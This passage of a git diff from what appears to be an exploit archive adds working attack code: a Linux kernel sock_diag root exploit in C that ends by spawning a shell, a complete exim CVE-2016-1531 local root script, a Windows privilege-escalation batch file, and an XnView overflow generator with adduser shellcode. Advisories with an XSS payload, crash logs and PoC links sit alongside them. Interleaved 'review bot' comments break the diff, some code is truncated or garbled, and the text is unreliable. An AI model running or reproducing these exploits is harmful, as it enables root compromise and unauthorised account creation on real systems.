+ if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){
+ printf("Can't create sock diag socket\n");
+ return -1;
+ }
+
+ memset(&req, 0, sizeof(req));
+ req.nlh.nlmsg_len = sizeof(req);
+ req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
+ req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
+ req.nlh.nlmsg_seq = 123456;
+
+ //req.r.sdiag_family = 89;
+ req.r.udiag_states = -1;
+ req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;
+
+ if(argc==1){
+ printf("Run: %s Fedora|Ubuntu\n",argv[0]);
+ return 0;
+ }
+ else if(strcmp(argv[1],"Fedora")==0){
+ commit_creds = (_commit_creds) get_symbol("commit_creds");
+ prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
+ sock_diag_handlers = get_symbol("sock_diag_handlers");
+ nl_table = get_symbol("nl_table");
+
+ if(!prepare_kernel_cred || !commit_creds || !sock_diag_handlers || !nl_table){
+ printf("some symbols are not available!\n");
+ exit(1);
+ }
+
+ family = (nl_table - sock_diag_handlers) / 4;
+ printf("family=%d\n",family);
+ req.r.sdiag_family = family;
+
+ if(family>255){
+ printf("nl_table is too far!\n");
+ exit(1);
+ }
+ }
+ else if(strcmp(argv[1],"Ubuntu")==0){
+ commit_creds = (_commit_creds) 0xc106bc60;
+ prepare_kernel_cred = (_prepare_kernel_cred) 0xc106bea0;
+ req.r.sdiag_family = 81;
+ }
+
+ unsigned long mmap_start, mmap_size;
+ mmap_start = 0x10000;
+ mmap_size = 0x120000;
+ printf("mmapping at 0x%lx, size = 0x%lx\n", mmap_start, mmap_size);
+
+ if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
+ MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
+ printf("mmap fault\n");
+ exit(1);
+ }
+ memset((void*)mmap_start, 0x90, mmap_size);
+
+ char jump[] = "\x55\x89\xe5\xb8\x11\x11\x11\x11\xff\xd0\x5d\xc3"; // jump_payload in asm
+ unsigned long *asd = &jump[4];
+ *asd = (unsigned long)kernel_code;
+
+ memcpy( (void*)mmap_start+mmap_size-sizeof(jump), jump, sizeof(jump));
+
+ if ( send(fd, &req, sizeof(req), 0) < 0) {
+ printf("bad send\n");
+ close(fd);
+ return -1;
+ }
+
+ printf("uid=%d, euid=%d\n",getuid(), geteuid() );
+
+ if(!getuid())
+ system("/bin/sh");
+
+}
\ No newline at end of file
diff --git a/platforms/linux/local/39535.sh b/platforms/linux/local/39535.sh
new file mode 100755
index 000000000..5d720c2ee
--- /dev/null
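Review bot: The fourteen `#include` directives at the top of the hunk carry no header names, so the file as committed cannot compile; presumably the angle-bracketed names were lost when the text was rendered and should be restored from the original source. Two smaller defects in the same file: `jump_payload_not_used` is declared `int` but falls off the end without a `return`, and `unsigned long *asd = &jump[4];` aliases a `char` array through an `unsigned long *`, which is an incompatible-pointer warning and stores `sizeof(unsigned long)` bytes into a 12-byte buffer, so it is only correct where that size is 4, matching the i686 build named in the header comment; a note such as `// 32-bit only: patches the 4-byte immediate at jump[4..7]` next to the declaration would make that limitation explicit. From a defensive standpoint, the Fedora branch aborts on its own `!prepare_kernel_cred || ...` check when `/proc/kallsyms` returns null addresses (as it does under a non-zero `kernel.kptr_restrict`), and the Ubuntu branch depends on the two fixed addresses being exact for the one kernel build listed in the header.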
+++ b/platforms/linux/local/39535.sh
@@ -0,0 +1,23 @@
+#!/bin/sh
+# CVE-2016-1531 exim <= 4.84-3 local root exploit
+# ===============================================
+# you can write files as root or force a perl module to
+# load by manipulating the perl environment and running
+# exim with the "perl_startup" arguement -ps.
+#
+# e.g.
+# [fantastic@localhost tmp]$ ./cve-2016-1531.sh
+# [ CVE-2016-1531 local root exploit
+# sh-4.3# id
+# uid=0(root) gid=1000(fantastic) groups=1000(fantastic)
+#
+# -- Hacker Fantastic
+echo [ CVE-2016-1531 local root exploit
+cat > /tmp/root.pm << EOF
+package root;
+use strict;
+use warnings;
+
+system("/bin/sh");
+EOF
+PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps
diff --git a/platforms/multiple/dos/39529.txt b/platforms/multiple/dos/39529.txt
new file mode 100755
index 000000000..7f4e62ede
--- /dev/null
+++ b/platforms/multiple/dos/39529.txt
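Review bot: The header comment misspells `argument`; the line should read `# exim with the "perl_startup" argument -ps.` The script also hard-codes `/usr/exim/bin/exim` and writes `/tmp/root.pm` at a fixed, predictable path with `cat >`, so it fails silently where the binary lives elsewhere and overwrites whatever already sits at that path; both assumptions belong in the comment block. For anyone triaging this, the behaviour described in the header hinges on a set-uid exim honouring `PERL5LIB`/`PERL5OPT` inherited from the caller's environment, which, as I understand it, is what the vendor fix for CVE-2016-1531 addressed by sanitising the environment before `perl_startup` runs.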
@@ -0,0 +1,71 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=739
+
+The following crash due to a use-after-free condition can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
+
+--- cut ---
+==6853==ERROR: AddressSanitizer: heap-use-after-free on address 0x60400009d960 at pc 0x7ff7905dc0fe bp 0x7fff079e9fc0 sp 0x7fff079e9fb8
+READ of size 4 at 0x60400009d960 thread T0
+ #0 0x7ff7905dc0fd in wtap_optionblock_free wireshark/wiretap/wtap_opttypes.c:161:20
+ #1 0x7ff7905d7b58 in wtap_close wireshark/wiretap/wtap.c:1211:4
+ #2 0x52a08b in load_cap_file wireshark/tshark.c:3685:3
+ #3 0x51e4bc in main wireshark/tshark.c:2213:13
+
+0x60400009d960 is located 16 bytes inside of 40-byte region [0x60400009d950,0x60400009d978)
+freed by thread T0 here:
+ #0 0x4c1d80 in __interceptor_free llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:30
+ #1 0x7ff7905dc32f in wtap_optionblock_free wireshark/wiretap/wtap_opttypes.c:173:9
+ #2 0x7ff7905d7b58 in wtap_close wireshark/wiretap/wtap.c:1211:4
+ #3 0x52a08b in load_cap_file wireshark/tshark.c:3685:3
+ #4 0x51e4bc in main wireshark/tshark.c:2213:13
+
+previously allocated by thread T0 here:
+ #0 0x4c2098 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
+ #1 0x7ff77bc84610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
+ #2 0x7ff79055907d in pcapng_read wireshark/wiretap/pcapng.c:2564:35
+ #3 0x7ff7905d825b in wtap_read wireshark/wiretap/wtap.c:1253:7
+ #4 0x528036 in load_cap_file wireshark/tshark.c:3499:12
+ #5 0x51e4bc in main wireshark/tshark.c:2213:13
+
+SUMMARY: AddressSanitizer: heap-use-after-free wireshark/wiretap/wtap_opttypes.c:161:20 in wtap_optionblock_free
+Shadow bytes around the buggy address:
+ 0x0c088000bad0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c088000bae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c088000baf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c088000bb00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c088000bb10: fa fa fa fa fa fa fa fa fa fa 00 00 00 00 00 fa
+=>0x0c088000bb20: fa fa 00 00 00 00 00 fa fa fa fd fd[fd]fd fd fa
+ 0x0c088000bb30: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa
+ 0x0c088000bb40: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa
+ 0x0c088000bb50: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa
+ 0x0c088000bb60: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 fa
+ 0x0c088000bb70: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 fa
+Shadow byte legend (one shadow byte represents 8 application bytes):
+ Addressable: 00
+ Partially addressable: 01 02 03 04 05 06 07
+ Heap left redzone: fa
+ Heap right redzone: fb
+ Freed heap region: fd
+ Stack left redzone: f1
+ Stack mid redzone: f2
+ Stack right redzone: f3
+ Stack partial redzone: f4
+ Stack after return: f5
+ Stack use after scope: f8
+ Global redzone: f9
+ Global init order: f6
+ Poisoned by user: f7
+ Container overflow: fc
+ Array cookie: ac
+ Intra object redzone: bb
+ ASan internal: fe
+ Left alloca redzone: ca
+ Right alloca redzone: cb
+==6853==ABORTING
+--- cut ---
+
+The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12173. Attached are three files which trigger the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39529.zip
+
diff --git a/platforms/php/webapps/39534.html b/platforms/php/webapps/39534.html
new file mode 100755
index 000000000..b8a220734
--- /dev/null
+++ b/platforms/php/webapps/39534.html
@@ -0,0 +1,42 @@
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/platforms/php/webapps/39536.txt b/platforms/php/webapps/39536.txt
new file mode 100755
index 000000000..10126a52f
--- /dev/null
+++ b/platforms/php/webapps/39536.txt
@@ -0,0 +1,148 @@
+-----BEGIN PGP SIGNED MESSAGE-----
+Hash: SHA256
+
+
+=== LSE Leading Security Experts GmbH - Security Advisory 2016-01-01 ===
+
+Wordpress ProjectTheme Multiple Vulnerabilities
+- - ------------------------------------------------------------
+
+Affected Version
+================
+Project Theme: 2.0.9.5
+
+Problem Overview
+================
+Technical Risk: high
+Likelihood of Exploitation: low
+Vendor: http://sitemile.com/
+Credits: LSE Leading Security Experts GmbH employee Tim Herres
+Advisory: https://www.lsexperts.de/advisories/lse-2016-01-01.txt
+Advisory Status: public
+CVE-Number: [NA yet]
+
+Problem Impact
+==============
+During an internal code review multiple vulnerabilities were identified.
+The whole application misses input validation and output encoding. This means user supplied input is inserted in a unsafe way.
+This could allow a remote attacker to easily compromise user accounts.
+
+Example:
+An authenticated user sends a private message to another user.
+When the attacker injects JavaScript Code, it will automatically call the CSRF Proc below.
+The only necessary information is the user id, which can be identified easily, see below.
+If the other user opens the private message menu, the JavaScript code gets executed and the Password will be changed. It is not necessary to open the message.
+Now the attacker can access the account using the new password.
+
+Problem Description
+===================
+The following findings are only examples, the whole application should be reviewed for similar vulnerabilities.
+
+#Stored Cross Site Scripting:
+Creating a new project http://[URL]/post-new/? in the project title and description field.
+Insert JavaScript code inside the project message board:
+POST /?get_message_board=34 HTTP/1.1
+sumbit_message=1&my_message=TestMessagBoard
+Also in the private message in the subject or in the message field. The payload in the Subject will be executed, if the user opens the private message list.
+
+#Reflected Cross Site Scripting:
+http://[IP]/advanced-search/?term=asdf&%22%3E%3Cscript%3Ealert%2811%29%3C%2fscript%3E
+
+# No protection against Cross Site Request Forgery Attacks
+There is no Cross Site Request Forgery protection.
+Also the user password can be changed without knowledge of the current password.
+A possible CSRF attack form, which will change the users password to "test":
+
+
+
+
+
+
+
+
+
+#Getting user id
+In a published project there is a button contact project owner with the corresponding UID --> url: http://[IP]/my-account/private-messages/?rdr=&pg=send&uid=1&pid=34.
+Also a mouseover in the user profile (Feedback) will reveal the userid.
+
+
+Temporary Workaround and Fix
+============================
+No fix
+
+History
+=======
+2015-12-20 Problem discovery during code review
+2016-01-12 Vendor contacted
+2016-01-12 Vendor response (check in progress)
+2016-01-26 Vendor contacted (asked for status update)
+2016-01-26 Vendor reponse (check in progress)
+2016-02-05 Vendor contacted (advisory will be released in 30 days)
+2016-03-07 Vendor contacted (asked for last status update)
+2016-03-07 Vendor response (vulnerabilities should be fixed in the last update 2.0.9.7 on 1st march 2016, not verified by the LSE)
+2016-03-08 Advisory release
+-----BEGIN PGP SIGNATURE-----
+Version: GnuPG v2
+
+iQIcBAEBCAAGBQJW3ojFAAoJEDgSCSGZ4yd8iQIQAOYTS8WaW0Tkw8JMwssV/N8F
+8O6tk4BYAkBbaMhk8rPBZBKcny7hTUiCsfLr7PYby9O3hcLmGMajhhyYg+5jjw1x
+XUQc6dsER9UAj7OukUHxqJH2trQvcQfCOQUx7iNgV4lHNfpOGDOBVvZYA/YNE6uF
+mUuyoGDdHlE3jE9WVGamsy2t5lrY5HOYXK6ZJkAv79MkeM6Dzdt2VXdZmN4UHzec
+NkAm0fvML143dcBt3BsuCsE5AhfBJGOesAUMkE7Z29HTux1fBrNyYs4KhzumSALy
+2I7h4WTozJMXBufEZkvqcGA6ikWATr31SzaUGjzyko96whegkNizJhpFqbAwtlZZ
+tz32tXjf97c+3mmpKvkHqsln2oPWJrfAEV2q96SlOuevFo38uJSYb31NNZrtfx7I
+5FoXr8ZgR98VIxeQcceF021JvM95J0ciLWWLkRYoE3VP1pQz9frrX7QfUU5+QrqT
+gCC49pWbeK00aVdlqgc3oquJd8kk4fVZ59HOaNJldQh2BM9isFscbQ8fDmYJna/K
+0VzgaoItc0OBR4hLywPi2MEVvHQm3r7Qe4JGsnr1imRg7i84GfbsuYsG8UH/FkDP
+4nWQnKcZFTrNzTNQdsvho/P6/d3Efp5zJr+GVkNwI4242yAYHaAfcfy+DzK7vDH+
+b3FqvVBebtLXMXwgRwx0
+=NlIz
+-----END PGP SIGNATURE-----
\ No newline at end of file
diff --git a/platforms/windows/dos/39530.txt b/platforms/windows/dos/39530.txt
new file mode 100755
index 000000000..697ced0c8
--- /dev/null
+++ b/platforms/windows/dos/39530.txt
@@ -0,0 +1,125 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=668
+
+The attached PE file causes memory corruption in Avast, it looks related to authenticode parsing.
+
+
+(474.c0c): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=128be364 ebx=30303030 ecx=12555e70 edx=128bd032 esi=30303030 edi=00000000
+eip=740b4454 esp=10cedfa8 ebp=12555e70 iopl=0 nv up ei pl nz na pe nc
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
+aswCmnBS_74080000!StreamHashClose+0x7dd4:
+740b4454 8b06 mov eax,dword ptr [esi] ds:002b:30303030=????????
+0:080> ub
+aswCmnBS_74080000!StreamHashClose+0x7dc5:
+740b4445 55 push ebp
+740b4446 56 push esi
+740b4447 57 push edi
+740b4448 33ff xor edi,edi
+740b444a 8be9 mov ebp,ecx
+740b444c 85db test ebx,ebx
+740b444e 7447 je aswCmnBS_74080000!StreamHashClose+0x7e17 (740b4497)
+740b4450 8b742418 mov esi,dword ptr [esp+18h]
+0:080> dd esp+18 L1
+10cedfc0 30303030
+
+# It looks like this address was a parameter, lets skip up a frame and see where it comes from
+0:080> kvn 3
+ # ChildEBP RetAddr Args to Child..............
+ WARNING: Stack unwind information not available. Following frames may be wrong.
+ 00 10cedfb4 740b483e 30303030 30303030 a00be921 aswCmnBS_74080000!StreamHashClose+0x7dd4
+ 01 10cedfe8 740c37e7 12481a88 00cf0400 00000008 aswCmnBS_74080000!StreamHashClose+0x81be
+ 02 10cee028 740aa2f5 12481a90 00001730 00030408 aswCmnBS_74080000!asw::root::CGenericFile::seekreadin+0xf7
+ 0:080> .frame /c 1
+ 01 10cedfe8 740c37e7 aswCmnBS_74080000!StreamHashClose+0x81be
+ eax=128be364 ebx=30303030 ecx=12555e70 edx=128bd032 esi=30303030 edi=00000000
+ eip=740b483e esp=10cedfbc ebp=73e1dca8 iopl=0 nv up ei pl nz na pe nc
+ cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
+ aswCmnBS_74080000!StreamHashClose+0x81be:
+ 740b483e 8bf8 mov edi,eax
+ 0:080> ub.
+ aswCmnBS_74080000!StreamHashClose+0x81aa:
+ 740b482a 0000 add byte ptr [eax],al
+ 740b482c 0001 add byte ptr [ecx],al
+ 740b482e 0000 add byte ptr [eax],al
+ 740b4830 00ff add bh,bh
+ 740b4832 7044 jo aswCmnBS_74080000!StreamHashClose+0x81f8 (740b4878)
+ 740b4834 8bce mov ecx,esi
+ 740b4836 ff7040 push dword ptr [eax+40h]
+ 740b4839 e802fcffff call aswCmnBS_74080000!StreamHashClose+0x7dc0 (740b4440)
+
+# The parameter comes from eax+40:
+ 0:080> dd eax+40 L1
+ 128be3a4 30303030
+
+# What is that address?
+
+ 0:080> !address @eax
+ Mapping file section regions...
+ Mapping module regions...
+ Mapping PEB regions...
+ Mapping TEB and stack regions...
+ Mapping heap regions...
+ Mapping page heap regions...
+ Mapping other regions...
+ Mapping stack trace database regions...
+ Mapping activation context regions...
+
+
+ Usage: Heap
+ Base Address: 128b8000
+ End Address: 128ea000
+ Region Size: 00032000
+ State: 00001000 MEM_COMMIT
+ Protect: 00000004 PAGE_READWRITE
+ Type: 00020000 MEM_PRIVATE
+ Allocation Base: 12150000
+ Allocation Protect: 00000004 PAGE_READWRITE
+ More info: heap owning the address: !heap 0x120000
+ More info: heap segment
+ More info: heap entry containing the address: !heap -x 0x128be364
+
+
+# It's a heap buffer, is it valid?
+
+ 0:080> !heap -x 0x128be364
+ Entry User Heap Segment Size PrevSize Unused Flags
+ -----------------------------------------------------------------------------
+ 128bd038 128bd040 00120000 122ef5e0 1408 - 3f LFH;busy.
+
+
+# Looks okay to me, where does that buffer come from?
+
+0:080> .frame /c 2
+02 10cee028 740aa2f5 aswCmnBS_74080000!asw::root::CGenericFile::seekreadin+0xf7
+eax=128be364 ebx=30303030 ecx=12555e70 edx=128bd032 esi=30303030 edi=00000000
+eip=740c37e7 esp=10cedff0 ebp=128be364 iopl=0 nv up ei pl nz na pe nc
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
+aswCmnBS_74080000!asw::root::CGenericFile::seekreadin+0xf7:
+740c37e7 83c40c add esp,0Ch
+0:080> ub
+aswCmnBS_74080000!asw::root::CGenericFile::seekreadin+0xe3:
+740c37d3 0000 add byte ptr [eax],al
+740c37d5 0000 add byte ptr [eax],al
+740c37d7 8b464c mov eax,dword ptr [esi+4Ch]
+740c37da 57 push edi
+740c37db 0345e8 add eax,dword ptr [ebp-18h]
+740c37de 50 push eax
+740c37df ff7510 push dword ptr [ebp+10h]
+740c37e2 e88bc70000 call aswCmnBS_74080000!BZ2_bzerr+0x1d62 (740cff72)
+0:080> dd ebp-18 L1
+128be34c 57d9ddea
+
+That is a really strange offset! And that DWORD appears in the input file at offset 316b3h:
+
+│000316a0 a8 65 18 e9 79 40 62 25-96 6e c7 c7 37 6a 83 21 |?e??y@b%?n??7j?!|...
+│000316b0 08 8e 41 ea dd d9 57 3f-1d 77 49 87 2a 16 06 5e |??A???W??wI?*??^|...
+│000316c0 a6 38 6a 22 12 a3 51 19-83 7e b6 00 00 31 82 04 |?8j"??Q??~? 1??|...
+
+This looks like broken authenticode parsing to me.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39530.zip
+
diff --git a/platforms/windows/dos/39533.txt b/platforms/windows/dos/39533.txt
new file mode 100755
index 000000000..676af6000
--- /dev/null
+++ b/platforms/windows/dos/39533.txt
@@ -0,0 +1,51 @@
+########################################################################################
+
+# Title: Adobe Digital Editions <= 4.5.0 - Critical memory corruption
+# Application: Adobe Digital Editions
+# Version: 4.5.0 and earlier versions
+# Platform: Windows, Macintosh, iOS and Android
+# Software Link: http://www.adobe.com/solutions/ebook/digital-editions.html
+# Date: March 8, 2016
+# CVE: CVE-2016-0954
+# Author: Pier-Luc Maltais from COSIG
+# Contact: https://twitter.com/COSIG_
+# Personal contact: https://twitter.com/plmaltais
+
+########################################################################################
+
+===================
+Introduction:
+===================
+ Adobe® Digital Editions software offers an engaging way to view and manage eBooks and
+ other digital publications. Use it to download and purchase digital content, which can
+ be read both online and offline. Transfer copy-protected eBooks from your personal
+ computer to other computers or devices. Organize your eBooks into a custom library and
+ annotate pages. Digital Editions also supports industry-standard eBook formats,
+ including PDF/A and EPUB. (http://www.adobe.com/ca_fr/products/digital-editions.html)
+
+########################################################################################
+
+===================
+Report Timeline:
+===================
+ 2015-10-24: Pier-Luc Maltais from COSIG found the issue and report it to Adobe PSIRT.
+ 2016-03-08: Vendor fixed the issue (APSB16-06).
+ 2016-03-08: Release of this advisory.
+
+########################################################################################
+
+===================
+Technical details:
+===================
+ A critical memory corruption occurs when Adobe Digital Editions handle a specially
+ crafted ExtGstate object, which could lead to remote code execution.
+
+########################################################################################
+
+==========
+POC:
+==========
+https://plmsecurity.net/sites/plmsecurity.net/files/APSB16-06_PoC.pdf
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39533.zip
+
+########################################################################################
\ No newline at end of file
diff --git a/platforms/windows/local/11199.txt b/platforms/windows/local/11199.txt
index 0a2b3bac9..e9dfbcc66 100755
--- a/platforms/windows/local/11199.txt
+++ b/platforms/windows/local/11199.txt
@@ -1,4 +1,7 @@ Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11199.zip (KiTrap0D.zip) +EDB Note: Make sure to run "vdmallowed.exe" (pre-compiled) inside the subfolder. + + Microsoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack -------------------------------------------------------------------------
@@ -151,11 +154,11 @@ described above. .text:0043C426 retn 4 /* ... */ -Possibly naive example code for triggering this condition is availble from the +Possibly naive example code for triggering this condition is available from the link below. http://lock.cmpxchg8b.com/c0af0967d904cef2ad4db766a00bc6af/KiTrap0D.zip -Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/KiTrap0D.zip +Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11199.zip (KiTrap0D.zip) The code has been tested on Windows XP, Windows Server 2003/2008, Windows Vista and Windows 7. Support for other affected operating systems is left as an
diff --git a/platforms/windows/local/271.c b/platforms/windows/local/271.c
index 317b16175..166ee82af 100755
--- a/platforms/windows/local/271.c
+++ b/platforms/windows/local/271.c
@@ -73,6 +73,6 @@ int main(int argc, char *argv[]) } - - -// milw0rm.com [2004-04-15] + + +// milw0rm.com [2004-04-15]
diff --git a/platforms/windows/local/35850.bat b/platforms/windows/local/35850.bat
index 6a130791d..8289f5d37 100755
--- a/platforms/windows/local/35850.bat
+++ b/platforms/windows/local/35850.bat
@@ -1,10 +1,14 @@ -source: http://www.securityfocus.com/bid/48232/info - -Microsoft Windows is prone to a local privilege-escalation vulnerability. - -A local attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts may cause a denial-of-service condition. - @echo off +REM +REM source: http://www.securityfocus.com/bid/48232/info +REM +REM Microsoft Windows is prone to a local privilege-escalation vulnerability. +REM +REM A local attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. +REM Successful exploits will result in the complete compromise of affected computers. +REM Failed exploit attempts may cause a denial-of-service condition. +REM + echo [+] Microsoft WinXP sp2/sp3 local system privilege escalation exploit start time /T > time.txt tskill explorer
@@ -25,7 +29,6 @@ at 13:37 /interactive cmd.exe at 13:37 /interactive explorer.exe at 13:37 /interactive at /del /y - echo [*] Backup time time < time.txt
diff --git a/platforms/windows/local/5951.c b/platforms/windows/local/5951.c
index 536f57df1..1385a4983 100755
--- a/platforms/windows/local/5951.c
+++ b/platforms/windows/local/5951.c
@@ -1,83 +1,83 @@ -#include -#include -/* - XnView 1.93.6 for Windows .taac buffer overflow proof of concept. - -The vulnerability is caused due to a boundary error when processing -the "format" keyword of Sun TAAC files. This can be exploited to -cause a stack-based buffer overflow by e.g. tricking a user into -viewing a specially crafted Sun TAAC file. - -Vulnerability discoverd by Secunia research http://secunia.com/secunia_research/2008-24/advisory/ - -Exploit code by Shinnok raydenxy@yahoo.com -http://www.rstcenter.com - -This poc will create a "special" .taac file that when opened or viewed in XnView 1.93.6 for Windows -will cause a buffer overflow and add an user "test" with password "test". -Tested on Windows XP sp2&sp3. - -greetz to escalation666 -/* - -/* win32_adduser - PASS=test EXITFUNC=seh USER=test Size=232 Encoder=PexFnstenvSub http://metasploit.com */ -unsigned char scode[] = -"\x2b\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xbf" -"\x93\x8f\x1e\x83\xeb\xfc\xe2\xf4\x43\x7b\xcb\x1e\xbf\x93\x04\x5b" -"\x83\x18\xf3\x1b\xc7\x92\x60\x95\xf0\x8b\x04\x41\x9f\x92\x64\x57" -"\x34\xa7\x04\x1f\x51\xa2\x4f\x87\x13\x17\x4f\x6a\xb8\x52\x45\x13" -"\xbe\x51\x64\xea\x84\xc7\xab\x1a\xca\x76\x04\x41\x9b\x92\x64\x78" -"\x34\x9f\xc4\x95\xe0\x8f\x8e\xf5\x34\x8f\x04\x1f\x54\x1a\xd3\x3a" -"\xbb\x50\xbe\xde\xdb\x18\xcf\x2e\x3a\x53\xf7\x12\x34\xd3\x83\x95" -"\xcf\x8f\x22\x95\xd7\x9b\x64\x17\x34\x13\x3f\x1e\xbf\x93\x04\x76" -"\x83\xcc\xbe\xe8\xdf\xc5\x06\xe6\x3c\x53\xf4\x4e\xd7\x63\x05\x1a" -"\xe0\xfb\x17\xe0\x35\x9d\xd8\xe1\x58\xf0\xe2\x7a\x91\xf6\xf7\x7b" -"\x9f\xbc\xec\x3e\xd1\xf6\xfb\x3e\xca\xe0\xea\x6c\x9f\xe7\xea\x6d" -"\xcb\xb3\xfb\x7b\xcc\xe7\xaf\x31\xfe\xd7\xcb\x3e\x99\xb5\xaf\x70" -"\xda\xe7\xaf\x72\xd0\xf0\xee\x72\xd8\xe1\xe0\x6b\xcf\xb3\xce\x7a" -"\xd2\xfa\xe1\x77\xcc\xe7\xfd\x7f\xcb\xfc\xfd\x6d\x9f\xe7\xea\x6d" -"\xcb\xb3\xa0\x5f\xfb\xd7\x8f\x1e"; - - -unsigned char ra_sp2[] = "\xed\x1e\x94\x7c"; -unsigned char ra_sp3[] = "\x83\xbf\x8a\x5b"; - 
-unsigned char nops1[257]; //256 * \x90 -unsigned char nops2[21]; //20 * \x90 - -int main(int argc, char **argv) -{ - int i; - FILE* f; - printf("[+] XnView 1.93.6 for Windows .taac buffer overflow\n"); - printf("[+] Discovered by Secunia : \nhttp://secunia.com/secunia_research/2008-24/advisory/\n"); - printf("[+] Coded by shinnok,greetz to escalation666.\n http://www.rstcenter.com \n"); - if ((argc!=2)||((atoi(argv[1])!=0)&&(atoi(argv[1])!=1))){ - printf("Usage: %s target\n",argv[0]); - printf("Where target is:\n"); - printf("0: WinXP SP2\n"); - printf("1: WinXP SP3\n"); - printf("Successfull exploitation will result in the adding of user \"test\" with password \"test\".\n"); - return EXIT_SUCCESS; - } - for(i=0;i<256;i++) nops1[i]='\x90'; - nops1[256]='\0'; - for(i=0;i<14;i++) nops2[i]='\x90'; - nops2[20]='\0'; - if(atoi(argv[1])==0) { - f=fopen("sploit.taac","wb"); - fprintf(f,"ncaa%crank=2;%cbands=3;%csize=125 123;%c",'\xa','\xa','\xa','\xa'); - fprintf(f,"format=%s%s%s%s;%c",nops1,ra_sp2,nops2,scode,'\xa'); - }else{ - f=fopen("sploit.taac","wb"); - fprintf(f,"ncaa%crank=2;%cbands=3;%csize=125 123;%c",'\xa','\xa','\xa','\xa'); - fprintf(f,"format=%s%s%s%s;%c",nops1,ra_sp3,nops2,scode,'\xa'); - } - fclose(f); - printf("sploit.taac created!\n"); - printf("Now open sploit.taac in XnView or browse from it to the folder containing sploit.taac.\n"); - printf("Then check with \"net user\" or from control panel for the user account test.\n"); - return EXIT_SUCCESS; -} - -// milw0rm.com [2008-06-26] +#include +#include +/* + XnView 1.93.6 for Windows .taac buffer overflow proof of concept. + +The vulnerability is caused due to a boundary error when processing +the "format" keyword of Sun TAAC files. This can be exploited to +cause a stack-based buffer overflow by e.g. tricking a user into +viewing a specially crafted Sun TAAC file. 
+ +Vulnerability discoverd by Secunia research http://secunia.com/secunia_research/2008-24/advisory/ + +Exploit code by Shinnok raydenxy@yahoo.com +http://www.rstcenter.com + +This poc will create a "special" .taac file that when opened or viewed in XnView 1.93.6 for Windows +will cause a buffer overflow and add an user "test" with password "test". +Tested on Windows XP sp2&sp3. + +greetz to escalation666 +/* + +/* win32_adduser - PASS=test EXITFUNC=seh USER=test Size=232 Encoder=PexFnstenvSub http://metasploit.com */ +unsigned char scode[] = +"\x2b\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xbf" +"\x93\x8f\x1e\x83\xeb\xfc\xe2\xf4\x43\x7b\xcb\x1e\xbf\x93\x04\x5b" +"\x83\x18\xf3\x1b\xc7\x92\x60\x95\xf0\x8b\x04\x41\x9f\x92\x64\x57" +"\x34\xa7\x04\x1f\x51\xa2\x4f\x87\x13\x17\x4f\x6a\xb8\x52\x45\x13" +"\xbe\x51\x64\xea\x84\xc7\xab\x1a\xca\x76\x04\x41\x9b\x92\x64\x78" +"\x34\x9f\xc4\x95\xe0\x8f\x8e\xf5\x34\x8f\x04\x1f\x54\x1a\xd3\x3a" +"\xbb\x50\xbe\xde\xdb\x18\xcf\x2e\x3a\x53\xf7\x12\x34\xd3\x83\x95" +"\xcf\x8f\x22\x95\xd7\x9b\x64\x17\x34\x13\x3f\x1e\xbf\x93\x04\x76" +"\x83\xcc\xbe\xe8\xdf\xc5\x06\xe6\x3c\x53\xf4\x4e\xd7\x63\x05\x1a" +"\xe0\xfb\x17\xe0\x35\x9d\xd8\xe1\x58\xf0\xe2\x7a\x91\xf6\xf7\x7b" +"\x9f\xbc\xec\x3e\xd1\xf6\xfb\x3e\xca\xe0\xea\x6c\x9f\xe7\xea\x6d" 